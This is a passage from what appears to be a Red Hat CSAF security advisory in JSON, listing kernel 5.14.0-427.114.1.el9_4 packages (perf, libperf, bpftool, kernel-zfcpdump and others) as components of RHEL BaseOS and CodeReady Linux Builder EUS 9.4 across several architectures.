"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.src as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.src",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
